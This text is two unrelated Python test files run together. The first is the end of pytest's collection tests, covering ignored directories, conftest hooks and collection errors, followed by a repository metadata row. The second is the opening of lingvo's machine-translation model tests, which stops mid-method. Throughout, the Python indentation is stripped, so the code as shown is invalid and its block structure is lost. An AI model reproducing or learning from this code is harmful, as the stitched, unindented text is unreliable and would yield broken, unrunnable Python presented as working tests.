tmpdir.ensure("build", 'test_notfound.py')
tmpdir.ensure("dist", 'test_notfound.py')
tmpdir.ensure("_darcs", 'test_notfound.py')
tmpdir.ensure("CVS", 'test_notfound.py')
tmpdir.ensure("{arch}", 'test_notfound.py')
tmpdir.ensure(".whatever", 'test_notfound.py')
tmpdir.ensure(".bzr", 'test_notfound.py')
tmpdir.ensure("normal", 'test_found.py')
for x in tmpdir.visit("test_*.py"):
x.write("def test_hello(): pass")
result = testdir.runpytest("--collect-only")
s = result.stdout.str()
assert "test_notfound" not in s
assert "test_found" in s
def test_custom_norecursedirs(self, testdir):
testdir.makeini("""
[pytest]
norecursedirs = mydir xyz*
""")
tmpdir = testdir.tmpdir
tmpdir.ensure("mydir", "test_hello.py").write("def test_1(): pass")
tmpdir.ensure("xyz123", "test_2.py").write("def test_2(): 0/0")
tmpdir.ensure("xy", "test_ok.py").write("def test_3(): pass")
rec = testdir.inline_run()
rec.assertoutcome(passed=1)
rec = testdir.inline_run("xyz123/test_2.py")
rec.assertoutcome(failed=1)
def test_testpaths_ini(self, testdir, monkeypatch):
testdir.makeini("""
[pytest]
testpaths = gui uts
""")
tmpdir = testdir.tmpdir
tmpdir.ensure("env", "test_1.py").write("def test_env(): pass")
tmpdir.ensure("gui", "test_2.py").write("def test_gui(): pass")
tmpdir.ensure("uts", "test_3.py").write("def test_uts(): pass")
# executing from rootdir only tests from `testpaths` directories
# are collected
items, reprec = testdir.inline_genitems('-v')
assert [x.name for x in items] == ['test_gui', 'test_uts']
# check that explicitly passing directories in the command-line
# collects the tests
for dirname in ('env', 'gui', 'uts'):
items, reprec = testdir.inline_genitems(tmpdir.join(dirname))
assert [x.name for x in items] == ['test_%s' % dirname]
# changing cwd to each subdirectory and running pytest without
# arguments collects the tests in that directory normally
for dirname in ('env', 'gui', 'uts'):
monkeypatch.chdir(testdir.tmpdir.join(dirname))
items, reprec = testdir.inline_genitems()
assert [x.name for x in items] == ['test_%s' % dirname]
class TestCollectPluginHookRelay:
def test_pytest_collect_file(self, testdir):
wascalled = []
class Plugin:
def pytest_collect_file(self, path, parent):
if not path.basename.startswith("."):
# Ignore hidden files, e.g. .testmondata.
wascalled.append(path)
testdir.makefile(".abc", "xyz")
pytest.main([testdir.tmpdir], plugins=[Plugin()])
assert len(wascalled) == 1
assert wascalled[0].ext == '.abc'
def test_pytest_collect_directory(self, testdir):
wascalled = []
class Plugin:
def pytest_collect_directory(self, path, parent):
wascalled.append(path.basename)
testdir.mkdir("hello")
testdir.mkdir("world")
pytest.main(testdir.tmpdir, plugins=[Plugin()])
assert "hello" in wascalled
assert "world" in wascalled
class TestPrunetraceback:
def test_custom_repr_failure(self, testdir):
p = testdir.makepyfile("""
import not_exists
""")
testdir.makeconftest("""
import pytest
def pytest_collect_file(path, parent):
return MyFile(path, parent)
class MyError(Exception):
pass
class MyFile(pytest.File):
def collect(self):
raise MyError()
def repr_failure(self, excinfo):
if excinfo.errisinstance(MyError):
return "hello world"
return pytest.File.repr_failure(self, excinfo)
""")
result = testdir.runpytest(p)
result.stdout.fnmatch_lines([
"*ERROR collecting*",
"*hello world*",
])
@pytest.mark.xfail(reason="other mechanism for adding to reporting needed")
def test_collect_report_postprocessing(self, testdir):
p = testdir.makepyfile("""
import not_exists
""")
testdir.makeconftest("""
import pytest
def pytest_make_collect_report(__multicall__):
rep = __multicall__.execute()
rep.headerlines += ["header1"]
return rep
""")
result = testdir.runpytest(p)
result.stdout.fnmatch_lines([
"*ERROR collecting*",
"*header1*",
])
class TestCustomConftests:
def test_ignore_collect_path(self, testdir):
testdir.makeconftest("""
def pytest_ignore_collect(path, config):
return path.basename.startswith("x") or \
path.basename == "test_one.py"
""")
sub = testdir.mkdir("xy123")
sub.ensure("test_hello.py").write("syntax error")
sub.join("conftest.py").write("syntax error")
testdir.makepyfile("def test_hello(): pass")
testdir.makepyfile(test_one="syntax error")
result = testdir.runpytest("--fulltrace")
assert result.ret == 0
result.stdout.fnmatch_lines(["*1 passed*"])
def test_ignore_collect_not_called_on_argument(self, testdir):
testdir.makeconftest("""
def pytest_ignore_collect(path, config):
return True
""")
p = testdir.makepyfile("def test_hello(): pass")
result = testdir.runpytest(p)
assert result.ret == 0
result.stdout.fnmatch_lines("*1 passed*")
result = testdir.runpytest()
assert result.ret == EXIT_NOTESTSCOLLECTED
result.stdout.fnmatch_lines("*collected 0 items*")
def test_collectignore_exclude_on_option(self, testdir):
testdir.makeconftest("""
collect_ignore = ['hello', 'test_world.py']
def pytest_addoption(parser):
parser.addoption("--XX", action="store_true", default=False)
def pytest_configure(config):
if config.getvalue("XX"):
collect_ignore[:] = []
""")
testdir.mkdir("hello")
testdir.makepyfile(test_world="def test_hello(): pass")
result = testdir.runpytest()
assert result.ret == EXIT_NOTESTSCOLLECTED
assert "passed" not in result.stdout.str()
result = testdir.runpytest("--XX")
assert result.ret == 0
assert "passed" in result.stdout.str()
def test_pytest_fs_collect_hooks_are_seen(self, testdir):
testdir.makeconftest("""
import pytest
class MyModule(pytest.Module):
pass
def pytest_collect_file(path, parent):
if path.ext == ".py":
return MyModule(path, parent)
""")
testdir.mkdir("sub")
testdir.makepyfile("def test_x(): pass")
result = testdir.runpytest("--collect-only")
result.stdout.fnmatch_lines([
"*MyModule*",
"*test_x*"
])
def test_pytest_collect_file_from_sister_dir(self, testdir):
sub1 = testdir.mkpydir("sub1")
sub2 = testdir.mkpydir("sub2")
conf1 = testdir.makeconftest("""
import pytest
class MyModule1(pytest.Module):
pass
def pytest_collect_file(path, parent):
if path.ext == ".py":
return MyModule1(path, parent)
""")
conf1.move(sub1.join(conf1.basename))
conf2 = testdir.makeconftest("""
import pytest
class MyModule2(pytest.Module):
pass
def pytest_collect_file(path, parent):
if path.ext == ".py":
return MyModule2(path, parent)
""")
conf2.move(sub2.join(conf2.basename))
p = testdir.makepyfile("def test_x(): pass")
p.copy(sub1.join(p.basename))
p.copy(sub2.join(p.basename))
result = testdir.runpytest("--collect-only")
result.stdout.fnmatch_lines([
"*MyModule1*",
"*MyModule2*",
"*test_x*"
])
class TestSession:
def test_parsearg(self, testdir):
p = testdir.makepyfile("def test_func(): pass")
subdir = testdir.mkdir("sub")
subdir.ensure("__init__.py")
target = subdir.join(p.basename)
p.move(target)
subdir.chdir()
config = testdir.parseconfig(p.basename)
rcol = Session(config=config)
assert rcol.fspath == subdir
parts = rcol._parsearg(p.basename)
assert parts[0] == target
assert len(parts) == 1
parts = rcol._parsearg(p.basename + "::test_func")
assert parts[0] == target
assert parts[1] == "test_func"
assert len(parts) == 2
def test_collect_topdir(self, testdir):
p = testdir.makepyfile("def test_func(): pass")
id = "::".join([p.basename, "test_func"])
# XXX migrate to collectonly? (see below)
config = testdir.parseconfig(id)
topdir = testdir.tmpdir
rcol = Session(config)
assert topdir == rcol.fspath
#rootid = rcol.nodeid
#root2 = rcol.perform_collect([rcol.nodeid], genitems=False)[0]
#assert root2 == rcol, rootid
colitems = rcol.perform_collect([rcol.nodeid], genitems=False)
assert len(colitems) == 1
assert colitems[0].fspath == p
def test_collect_protocol_single_function(self, testdir):
p = testdir.makepyfile("def test_func(): pass")
id = "::".join([p.basename, "test_func"])
items, hookrec = testdir.inline_genitems(id)
item, = items
assert item.name == "test_func"
newid = item.nodeid
assert newid == id
py.std.pprint.pprint(hookrec.calls)
topdir = testdir.tmpdir # noqa
hookrec.assert_contains([
("pytest_collectstart", "collector.fspath == topdir"),
("pytest_make_collect_report", "collector.fspath == topdir"),
("pytest_collectstart", "collector.fspath == p"),
("pytest_make_collect_report", "collector.fspath == p"),
("pytest_pycollect_makeitem", "name == 'test_func'"),
("pytest_collectreport", "report.nodeid.startswith(p.basename)"),
("pytest_collectreport", "report.nodeid == ''")
])
def test_collect_protocol_method(self, testdir):
p = testdir.makepyfile("""
class TestClass:
def test_method(self):
pass
""")
normid = p.basename + "::TestClass::()::test_method"
for id in [p.basename,
p.basename + "::TestClass",
p.basename + "::TestClass::()",
normid,
]:
items, hookrec = testdir.inline_genitems(id)
assert len(items) == 1
assert items[0].name == "test_method"
newid = items[0].nodeid
assert newid == normid
def test_collect_custom_nodes_multi_id(self, testdir):
p = testdir.makepyfile("def test_func(): pass")
testdir.makeconftest("""
import pytest
class SpecialItem(pytest.Item):
def runtest(self):
return # ok
class SpecialFile(pytest.File):
def collect(self):
return [SpecialItem(name="check", parent=self)]
def pytest_collect_file(path, parent):
if path.basename == %r:
return SpecialFile(fspath=path, parent=parent)
""" % p.basename)
id = p.basename
items, hookrec = testdir.inline_genitems(id)
py.std.pprint.pprint(hookrec.calls)
assert len(items) == 2
hookrec.assert_contains([
("pytest_collectstart",
"collector.fspath == collector.session.fspath"),
("pytest_collectstart",
"collector.__class__.__name__ == 'SpecialFile'"),
("pytest_collectstart",
"collector.__class__.__name__ == 'Module'"),
("pytest_pycollect_makeitem", "name == 'test_func'"),
("pytest_collectreport", "report.nodeid.startswith(p.basename)"),
#("pytest_collectreport",
# "report.fspath == %r" % str(rcol.fspath)),
])
def test_collect_subdir_event_ordering(self, testdir):
p = testdir.makepyfile("def test_func(): pass")
aaa = testdir.mkpydir("aaa")
test_aaa = aaa.join("test_aaa.py")
p.move(test_aaa)
items, hookrec = testdir.inline_genitems()
assert len(items) == 1
py.std.pprint.pprint(hookrec.calls)
hookrec.assert_contains([
("pytest_collectstart", "collector.fspath == test_aaa"),
("pytest_pycollect_makeitem", "name == 'test_func'"),
("pytest_collectreport",
"report.nodeid.startswith('aaa/test_aaa.py')"),
])
def test_collect_two_commandline_args(self, testdir):
p = testdir.makepyfile("def test_func(): pass")
aaa = testdir.mkpydir("aaa")
bbb = testdir.mkpydir("bbb")
test_aaa = aaa.join("test_aaa.py")
p.copy(test_aaa)
test_bbb = bbb.join("test_bbb.py")
p.move(test_bbb)
id = "."
items, hookrec = testdir.inline_genitems(id)
assert len(items) == 2
py.std.pprint.pprint(hookrec.calls)
hookrec.assert_contains([
("pytest_collectstart", "collector.fspath == test_aaa"),
("pytest_pycollect_makeitem", "name == 'test_func'"),
("pytest_collectreport", "report.nodeid == 'aaa/test_aaa.py'"),
("pytest_collectstart", "collector.fspath == test_bbb"),
("pytest_pycollect_makeitem", "name == 'test_func'"),
("pytest_collectreport", "report.nodeid == 'bbb/test_bbb.py'"),
])
def test_serialization_byid(self, testdir):
testdir.makepyfile("def test_func(): pass")
items, hookrec = testdir.inline_genitems()
assert len(items) == 1
item, = items
items2, hookrec = testdir.inline_genitems(item.nodeid)
item2, = items2
assert item2.name == item.name
assert item2.fspath == item.fspath
def test_find_byid_without_instance_parents(self, testdir):
p = testdir.makepyfile("""
class TestClass:
def test_method(self):
pass
""")
arg = p.basename + ("::TestClass::test_method")
items, hookrec = testdir.inline_genitems(arg)
assert len(items) == 1
item, = items
assert item.nodeid.endswith("TestClass::()::test_method")
class Test_getinitialnodes:
def test_global_file(self, testdir, tmpdir):
x = tmpdir.ensure("x.py")
with tmpdir.as_cwd():
config = testdir.parseconfigure(x)
col = testdir.getnode(config, x)
assert isinstance(col, pytest.Module)
assert col.name == 'x.py'
assert col.parent.name == testdir.tmpdir.basename
assert col.parent.parent is None
for col in col.listchain():
assert col.config is config
def test_pkgfile(self, testdir):
tmpdir = testdir.tmpdir
subdir = tmpdir.join("subdir")
x = subdir.ensure("x.py")
subdir.ensure("__init__.py")
with subdir.as_cwd():
config = testdir.parseconfigure(x)
col = testdir.getnode(config, x)
assert isinstance(col, pytest.Module)
assert col.name == 'x.py'
assert col.parent.parent is None
for col in col.listchain():
assert col.config is config
class Test_genitems:
def test_check_collect_hashes(self, testdir):
p = testdir.makepyfile("""
def test_1():
pass
def test_2():
pass
""")
p.copy(p.dirpath(p.purebasename + "2" + ".py"))
items, reprec = testdir.inline_genitems(p.dirpath())
assert len(items) == 4
for numi, i in enumerate(items):
for numj, j in enumerate(items):
if numj != numi:
assert hash(i) != hash(j)
assert i != j
def test_example_items1(self, testdir):
p = testdir.makepyfile('''
def testone():
pass
class TestX:
def testmethod_one(self):
pass
class TestY(TestX):
pass
''')
items, reprec = testdir.inline_genitems(p)
assert len(items) == 3
assert items[0].name == 'testone'
assert items[1].name == 'testmethod_one'
assert items[2].name == 'testmethod_one'
# let's also test getmodpath here
assert items[0].getmodpath() == "testone"
assert items[1].getmodpath() == "TestX.testmethod_one"
assert items[2].getmodpath() == "TestY.testmethod_one"
s = items[0].getmodpath(stopatmodule=False)
assert s.endswith("test_example_items1.testone")
print(s)
def test_class_and_functions_discovery_using_glob(self, testdir):
"""
tests that python_classes and python_functions config options work
as prefixes and glob-like patterns (issue #600).
"""
testdir.makeini("""
[pytest]
python_classes = *Suite Test
python_functions = *_test test
""")
p = testdir.makepyfile('''
class MyTestSuite:
def x_test(self):
pass
class TestCase:
def test_y(self):
pass
''')
items, reprec = testdir.inline_genitems(p)
ids = [x.getmodpath() for x in items]
assert ids == ['MyTestSuite.x_test', 'TestCase.test_y']
def test_matchnodes_two_collections_same_file(testdir):
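    # Two collect_file hooks (one from a registered plugin, one from conftest)
    # both claim ".abc" files; every resulting item should run, and the item
    # produced by the second collector stays addressable by node id.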
testdir.makeconftest("""
import pytest
def pytest_configure(config):
config.pluginmanager.register(Plugin2())
class Plugin2:
def pytest_collect_file(self, path, parent):
if path.ext == ".abc":
return MyFile2(path, parent)
def pytest_collect_file(path, parent):
if path.ext == ".abc":
return MyFile1(path, parent)
class MyFile1(pytest.Item, pytest.File):
def runtest(self):
pass
class MyFile2(pytest.File):
def collect(self):
return [Item2("hello", parent=self)]
class Item2(pytest.Item):
def runtest(self):
pass
""")
p = testdir.makefile(".abc", "")
result = testdir.runpytest()
assert result.ret == 0
result.stdout.fnmatch_lines([
"*2 passed*",
])
res = testdir.runpytest("%s::hello" % p.basename)
res.stdout.fnmatch_lines([
"*1 passed*",
])
class TestNodekeywords:
def test_no_under(self, testdir):
modcol = testdir.getmodulecol("""
def test_pass(): pass
def test_fail(): assert 0
""")
l = list(modcol.keywords)
assert modcol.name in l
for x in l:
assert not x.startswith("_")
assert modcol.name in repr(modcol.keywords)
def test_issue345(self, testdir):
testdir.makepyfile("""
def test_should_not_be_selected():
assert False, 'I should not have been selected to run'
def test___repr__():
pass
""")
reprec = testdir.inline_run("-k repr")
reprec.assertoutcome(passed=1, failed=0)
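# Source modules shared by the collection-error tests below: one failing test,
# two modules that raise ImportError during collection, and one passing test.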
COLLECTION_ERROR_PY_FILES = dict(
test_01_failure="""
def test_1():
assert False
""",
test_02_import_error="""
import asdfasdfasdf
def test_2():
assert True
""",
test_03_import_error="""
import asdfasdfasdf
def test_3():
assert True
""",
test_04_success="""
def test_4():
assert True
""",
)
def test_exit_on_collection_error(testdir):
"""Verify that all collection errors are collected and no tests executed"""
testdir.makepyfile(**COLLECTION_ERROR_PY_FILES)
res = testdir.runpytest()
assert res.ret == 2
res.stdout.fnmatch_lines([
"collected 2 items / 2 errors",
"*ERROR collecting test_02_import_error.py*",
"*No module named *asdfa*",
"*ERROR collecting test_03_import_error.py*",
"*No module named *asdfa*",
])
def test_exit_on_collection_with_maxfail_smaller_than_n_errors(testdir):
"""
    Verify collection is aborted once maxfail errors are encountered, ignoring
further modules which would cause more collection errors.
"""
testdir.makepyfile(**COLLECTION_ERROR_PY_FILES)
res = testdir.runpytest("--maxfail=1")
assert res.ret == 2
res.stdout.fnmatch_lines([
"*ERROR collecting test_02_import_error.py*",
"*No module named *asdfa*",
"*Interrupted: stopping after 1 failures*",
])
assert 'test_03' not in res.stdout.str()
def test_exit_on_collection_with_maxfail_bigger_than_n_errors(testdir):
"""
    Verify the test run aborts due to collection errors even if the maxfail count of
errors was not reached.
"""
testdir.makepyfile(**COLLECTION_ERROR_PY_FILES)
res = testdir.runpytest("--maxfail=4")
assert res.ret == 2
res.stdout.fnmatch_lines([
"collected 2 items / 2 errors",
"*ERROR collecting test_02_import_error.py*",
"*No module named *asdfa*",
"*ERROR collecting test_03_import_error.py*",
"*No module named *asdfa*",
])
def test_continue_on_collection_errors(testdir):
"""
    Verify tests are executed even when collection errors occur, as long as the
--continue-on-collection-errors flag is set
"""
testdir.makepyfile(**COLLECTION_ERROR_PY_FILES)
res = testdir.runpytest("--continue-on-collection-errors")
assert res.ret == 1
res.stdout.fnmatch_lines([
"collected 2 items / 2 errors",
"*1 failed, 1 passed, 2 error*",
])
def test_continue_on_collection_errors_maxfail(testdir):
"""
Verify tests are executed even when collection errors occur and that maxfail
is honoured (including the collection error count).
4 tests: 2 collection errors + 1 failure + 1 success
test_4 is never executed because the test run is with --maxfail=3 which
means it is interrupted after the 2 collection errors + 1 failure.
"""
testdir.makepyfile(**COLLECTION_ERROR_PY_FILES)
res = testdir.runpytest("--continue-on-collection-errors", "--maxfail=3")
assert res.ret == 2
res.stdout.fnmatch_lines([
"collected 2 items / 2 errors",
"*Interrupted: stopping after 3 failures*",
"*1 failed, 2 error*",
])
| jaraco/pytest | testing/test_collection.py | Python | mit | 26,378 | 0.000986 |
# Lint as: python3
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for MT Models."""
import lingvo.compat as tf
from lingvo.core import base_input_generator
from lingvo.core import base_layer
from lingvo.core import cluster_factory
from lingvo.core import layers
from lingvo.core import optimizer
from lingvo.core import py_utils
from lingvo.core import schedule
from lingvo.core import test_helper
from lingvo.core import test_utils
from lingvo.tasks.mt import decoder
from lingvo.tasks.mt import encoder
from lingvo.tasks.mt import input_generator
from lingvo.tasks.mt import model
import numpy as np
FLAGS = tf.flags.FLAGS
_TF_RANDOM_SEED = 93820986
class TestInputGenerator(base_input_generator.BaseSequenceInputGenerator):
@classmethod
def Params(cls):
p = super().Params()
p.Define('split', True, '')
return p
def __init__(self, params):
super().__init__(params)
self._step = 0
def InfeedBatchSize(self):
if self.params.split:
return 10 / 2
return 10
def _InputBatch(self):
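    # Build a deterministic synthetic batch.  With p.split enabled, alternate
    # between the two halves of the batch based on the parity of the global step.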
np.random.seed(1)
bs, sl = 10, 7
src_ids = tf.constant(
np.random.randint(low=0, high=8192 - 1, size=[bs, sl], dtype=np.int32))
tgt_ids = tf.constant(
np.random.randint(low=0, high=8192 - 1, size=[bs, sl], dtype=np.int32))
tgt_labels = tf.constant(
np.random.randint(low=0, high=8192 - 1, size=[bs, sl], dtype=np.int32))
tgt_weights = tf.constant(np.ones(shape=[bs, sl], dtype=np.float32))
src_paddings = tf.zeros([bs, sl])
tgt_paddings = tf.zeros([bs, sl])
ret = py_utils.NestedMap()
ret.src = py_utils.NestedMap()
ret.tgt = py_utils.NestedMap()
if self.params.split:
src_ids = tf.split(src_ids, 2, 0)
src_paddings = tf.split(src_paddings, 2, 0)
tgt_ids = tf.split(tgt_ids, 2, 0)
tgt_labels = tf.split(tgt_labels, 2, 0)
tgt_paddings = tf.split(tgt_paddings, 2, 0)
tgt_weights = tf.split(tgt_weights, 2, 0)
ret.src.ids = tf.cond(
tf.equal(tf.math.floormod(py_utils.GetGlobalStep(), 2), 0),
lambda: src_ids[0], lambda: src_ids[1])
ret.src.paddings = tf.cond(
tf.equal(tf.math.floormod(py_utils.GetGlobalStep(), 2), 0),
lambda: src_paddings[0], lambda: src_paddings[1])
ret.tgt.ids = tf.cond(
tf.equal(tf.math.floormod(py_utils.GetGlobalStep(), 2), 0),
lambda: tgt_ids[0], lambda: tgt_ids[1])
ret.tgt.labels = tf.cond(
tf.equal(tf.math.floormod(py_utils.GetGlobalStep(), 2), 0),
lambda: tgt_labels[0], lambda: tgt_labels[1])
ret.tgt.paddings = tf.cond(
tf.equal(tf.math.floormod(py_utils.GetGlobalStep(), 2), 0),
lambda: tgt_paddings[0], lambda: tgt_paddings[1])
ret.tgt.weights = tf.cond(
tf.equal(tf.math.floormod(py_utils.GetGlobalStep(), 2), 0),
lambda: tgt_weights[0], lambda: tgt_weights[1])
else:
ret.src.ids = src_ids
ret.src.paddings = src_paddings
ret.tgt.ids = tgt_ids
ret.tgt.labels = tgt_labels
ret.tgt.paddings = tgt_paddings
ret.tgt.weights = tgt_weights
return ret
class TransformerModelTest(test_utils.TestCase):
def _InputParams(self):
p = input_generator.NmtInput.Params()
input_file = test_helper.test_src_dir_path(
'tasks/mt/testdata/wmt14_ende_wpm_32k_test.tfrecord')
vocab_file = test_helper.test_src_dir_path(
'tasks/mt/testdata/wmt14_ende_wpm_32k_test.vocab')
p.file_pattern = 'tfrecord:' + input_file
p.file_random_seed = 31415
p.file_parallelism = 1
p.bucket_upper_bound = [40]
p.bucket_batch_limit = [8]
p.source_max_length = 200
p.target_max_length = 200
p.tokenizer.token_vocab_filepath = vocab_file
p.tokenizer.vocab_size = 32000
return p
def _EncoderParams(self):
p = encoder.TransformerEncoder.Params()
p.name = 'encoder'
p.random_seed = 1234
p.model_dim = 4
p.token_emb.embedding_dim = 4
p.token_emb.max_num_shards = 1
p.token_emb.params_init = py_utils.WeightInit.GaussianSqrtDim(
seed=p.random_seed)
p.position_emb.embedding_dim = 4
p.transformer_stack.transformer_tpl.tr_atten_tpl.num_attention_heads = 2
p.transformer_stack.transformer_tpl.tr_fflayer_tpl.hidden_dim = 5
return p
def _DecoderParams(self):
p = decoder.TransformerDecoder.Params()
p.name = 'decoder'
p.random_seed = 1234
p.source_dim = 4
p.model_dim = 4
p.token_emb.embedding_dim = 4
p.token_emb.max_num_shards = 1
p.token_emb.params_init = py_utils.WeightInit.GaussianSqrtDim(
seed=p.random_seed)
p.position_emb.embedding_dim = 4
p.trans_tpl.source_dim = 4
p.trans_tpl.tr_atten_tpl.source_dim = 4
p.trans_tpl.tr_atten_tpl.num_attention_heads = 2
p.trans_tpl.tr_fflayer_tpl.input_dim = 4
p.trans_tpl.tr_fflayer_tpl.hidden_dim = 8
p.softmax.num_shards = 1
p.target_seq_len = 5
return p
def _testParams(self):
p = model.TransformerModel.Params()
p.name = 'test_mdl'
p.input = self._InputParams()
p.encoder = self._EncoderParams()
p.decoder = self._DecoderParams()
p.train.learning_rate = 2e-4
return p
def testConstruction(self):
with self.session():
p = self._testParams()
mdl = p.Instantiate()
print('vars = ', mdl.vars)
flatten_vars = mdl.vars.Flatten()
print('vars flattened = ', flatten_vars)
self.assertEqual(len(flatten_vars), 238)
# Should match tf.trainable_variables().
self.assertEqual(len(tf.trainable_variables()), len(flatten_vars))
def testFProp(self, dtype=tf.float32, fprop_dtype=tf.float32):
with self.session():
tf.random.set_seed(_TF_RANDOM_SEED)
p = self._testParams()
p.dtype = dtype
if fprop_dtype:
p.fprop_dtype = fprop_dtype
p.input.dtype = fprop_dtype
mdl = p.Instantiate()
mdl.FPropDefaultTheta()
loss = mdl.loss
logp = mdl.eval_metrics['log_pplx'][0]
self.evaluate(tf.global_variables_initializer())
vals = []
for _ in range(5):
vals += [self.evaluate((loss, logp))]
print('actual vals = %s' % np.array_repr(np.array(vals)))
self.assertAllClose(vals, [[226.99771, 10.377038], [243.92978, 10.379991],
[260.7751, 10.379107], [201.10846, 10.379791],
[272.22006, 10.370288]])
def testFPropEvalMode(self):
with self.session(), self.SetEval(True):
tf.random.set_seed(_TF_RANDOM_SEED)
p = self._testParams()
mdl = p.Instantiate()
mdl.FPropDefaultTheta()
loss = mdl.loss
logp = mdl.eval_metrics['log_pplx'][0]
self.evaluate(tf.global_variables_initializer())
vals = []
for _ in range(5):
vals += [self.evaluate((loss, logp))]
print('actual vals = ', vals)
self.assertAllClose(vals, [(226.99771, 10.377038), (243.92978, 10.379991),
(260.7751, 10.379107), (201.10846, 10.379791),
(272.22006, 10.370288)])
def testBProp(self):
with self.session():
tf.random.set_seed(_TF_RANDOM_SEED)
p = self._testParams()
mdl = p.Instantiate()
mdl.FPropDefaultTheta()
mdl.BProp()
loss = mdl.loss
logp = mdl.eval_metrics['log_pplx'][0]
self.evaluate(tf.global_variables_initializer())
vals = []
for _ in range(5):
vals += [self.evaluate((loss, logp, mdl.train_op))[:2]]
print('BProp actual vals = ', vals)
expected_vals = [(226.99771, 10.377038), (243.87854, 10.3778105),
(260.66788, 10.374841), (200.94312, 10.371258),
(271.9328, 10.3593445)]
self.assertAllClose(vals, expected_vals)
def testBPropWithAccumComparison(self):
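    # Accumulating gradients over two half-batches should match one SGD step on
    # the full batch; compare the decoder softmax weights after both runs.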
def _SetDefaults(p):
p.random_seed = 12345
p.decoder.input_dropout_prob = 0.0
mp = p.encoder.transformer_stack.transparent_merger_tpl
mp.weighted_merger_dropout_prob = 0.0
disable_vn = py_utils.VariationalNoiseParams(1.0, False, False)
for lp in base_layer.RecursiveFindLayerParams(p):
# TODO(lepikhin): lp.dtype = dtype
lp.params_init = py_utils.WeightInit.Gaussian(0.1, 12345)
lp.vn = disable_vn
tp = p.train
assert tp.l2_regularizer_weight is None
tp.clip_gradient_norm_to_value = False
tp.grad_norm_to_clip_to_zero = False
tp.optimizer = optimizer.SGD.Params()
tp.learning_rate = 1e-2
tp.lr_schedule = schedule.ContinuousSchedule.Params()
for l in p.ToText().split('\n'):
print(l)
return p
with self.session(use_gpu=False, graph=tf.Graph()):
tf.random.set_seed(_TF_RANDOM_SEED)
p = self._testParams()
p.input = TestInputGenerator.Params()
p.input.split = True
p = _SetDefaults(p)
p.train.optimizer = optimizer.Accumulator.Params().Set(
accum_steps=2, optimizer_tpl=p.train.optimizer)
mdl = p.Instantiate()
mdl.FPropDefaultTheta()
mdl.BProp()
self.evaluate(tf.global_variables_initializer())
for _ in range(2):
self.evaluate(mdl.train_op)
expected = self.evaluate(mdl.dec.softmax.vars['weight_0'])
with self.session(use_gpu=False, graph=tf.Graph()):
tf.random.set_seed(_TF_RANDOM_SEED)
p = self._testParams()
p.input = TestInputGenerator.Params()
p.input.split = False
p = _SetDefaults(p)
mdl = p.Instantiate()
mdl.FPropDefaultTheta()
mdl.BProp()
self.evaluate(tf.global_variables_initializer())
self.evaluate(mdl.train_op)
actual = self.evaluate(mdl.dec.softmax.vars['weight_0'])
self.assertAllClose(expected, actual, rtol=1e-2, atol=1e-2)
def testBatchSplit(self):
def Run(num_splits):
with self.session(use_gpu=False, graph=tf.Graph()):
tf.random.set_seed(93820981)
p = self._testParams()
p.input.bucket_batch_limit = [
b * 2 / num_splits for b in p.input.bucket_batch_limit
]
with cluster_factory.ForTestingWorker(gpus=num_splits):
mdl = p.Instantiate()
metrics = mdl.FPropDefaultTheta()[0]
self.evaluate(tf.global_variables_initializer())
return self.evaluate(metrics['loss'])
res1, res2 = Run(1), Run(2)
self.assertAllClose(res1[0], res2[0])
self.assertAllEqual(res1[1], res2[1])
def testBatchSizeInInputGenerator(self):
with self.session():
tf.random.set_seed(_TF_RANDOM_SEED)
p = self._testParams()
with cluster_factory.ForTestingWorker(
mode='sync', job='trainer_client', gpus=5):
mdl = p.Instantiate()
mdl.FPropDefaultTheta()
loss = mdl.loss
self.evaluate(tf.global_variables_initializer())
_ = self.evaluate(loss)
self.assertEqual(mdl.input_generator.infeed_bucket_batch_limit, [40])
def testDecode(self):
with self.session(use_gpu=False):
tf.random.set_seed(93820985)
p = self._testParams()
mdl = p.Instantiate()
input_batch = mdl.input_generator.GetPreprocessedInputBatch()
dec_out_dict = mdl.Decode(input_batch)
self.evaluate(tf.global_variables_initializer())
dec_out = self.evaluate(dec_out_dict)
metrics_dict = mdl.CreateDecoderMetrics()
key_value_pairs = mdl.PostProcessDecodeOut(dec_out, metrics_dict)
self.assertNear(0.0, metrics_dict['corpus_bleu'].value, 1.0e-5)
self.assertLen(key_value_pairs, 8)
for k, v in key_value_pairs:
self.assertIn(k, v)
class RNMTModelTest(test_utils.TestCase):
def _InputParams(self):
p = input_generator.NmtInput.Params()
input_file = test_helper.test_src_dir_path(
'tasks/mt/testdata/wmt14_ende_wpm_32k_test.tfrecord')
vocab_file = test_helper.test_src_dir_path(
'tasks/mt/testdata/wmt14_ende_wpm_32k_test.vocab')
p.file_pattern = 'tfrecord:' + input_file
p.file_random_seed = 31415
p.file_parallelism = 1
p.bucket_upper_bound = [40]
p.bucket_batch_limit = [8]
p.source_max_length = 200
p.target_max_length = 200
p.tokenizer.token_vocab_filepath = vocab_file
p.tokenizer.vocab_size = 32000
return p
def _EncoderParams(self):
p = encoder.MTEncoderBiRNN.Params()
p.name = 'encoder'
p.emb.vocab_size = 32000
p.emb.embedding_dim = 4
p.emb.max_num_shards = 1
p.lstm_cell_size = 4
p.num_lstm_layers = 3
p.encoder_out_dim = 4
return p
def _DecoderParams(self):
p = decoder.MTDecoderV1.Params()
p.name = 'decoder'
p.source_dim = 4
p.emb.vocab_size = 32000
p.emb.embedding_dim = 4
p.emb.max_num_shards = 1
p.rnn_cell_dim = 4
p.rnn_layers = 3
p.attention.hidden_dim = 2
p.softmax.num_classes = 32000
p.softmax.num_shards = 1
return p
def _testParams(self):
p = model.RNMTModel.Params()
p.name = 'test_mdl'
p.input = self._InputParams()
p.encoder = self._EncoderParams()
p.decoder = self._DecoderParams()
p.train.learning_rate = 1.0
return p
def testConstruction(self):
with self.session():
p = self._testParams()
mdl = p.Instantiate()
flatten_vars = mdl.vars.Flatten()
# encoder/embedding: 1
# encoder/lstms: 2 * (3 (forward) + 3 (backward))
# encoder/proj: 2
# decoder/embedding: 1
# decoder/atten: 3
# decoder/lstms: 2 * 3
# decoder/softmax: 2
self.assertEqual(len(flatten_vars), 1 + 12 + 2 + 1 + 3 + 6 + 2)
# Should match tf.trainable_variables().
